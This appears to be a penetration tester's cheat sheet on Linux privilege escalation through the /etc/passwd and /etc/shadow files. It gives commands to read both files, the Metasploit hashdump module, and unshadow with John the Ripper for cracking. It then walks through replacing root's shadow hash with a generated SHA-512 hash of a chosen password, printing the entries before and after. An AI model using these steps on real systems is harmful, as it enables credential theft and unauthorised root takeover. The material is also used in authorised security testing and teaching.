Linux Privilege Escalation [passwd/shadow]

  • Escalation

/etc/passwd, /etc/shadow

Obtain a copy of these files to crack root or privileged user passwords.

cat /etc/passwd
cat /etc/shadow 2>/dev/null

 

Metasploit

post/linux/gather/hashdump

 

Crack

/usr/bin/unshadow /etc/passwd /etc/shadow > /tmp/output.db
john /tmp/output.db

 

Modifiy the password

Password: 

$id$salt$hashed

$id

  1. $1$ is MD5
  2. $2a$ is Blowfish
  3. $2y$ is Blowfish
  4. $5$ is SHA-256
  5. $6$ is SHA-512

 

Before:

root:$6$RIgrVboA$HDaB29xvtkw6U/Mzq4qOHH2KHB1kIR0ezFyjL75DszasVFwznrsWcc1Tu5E2K4FA7/Nv8oje0c.bljjnn6FMF1:17673:0:99999:7:::

 

Generate password:

mkpasswd  -m sha-512 -S herethesalt -s
Mot de passe : Passw0rd123!!
$6$herethesalt$FQtxbL4NRb.WG5MVz/SGj46uMI8tfksdu5zfgDNJ0So3fUFkJkMrBPIRNDralwdvvLXn3v/UX6NXzcFualgyU0

 

After:

root:$6$herethesalt$FQtxbL4NRb.WG5MVz/SGj46uMI8tfksdu5zfgDNJ0So3fUFkJkMrBPIRNDralwdvvLXn3v/UX6NXzcFualgyU0:17673:0:99999:7:::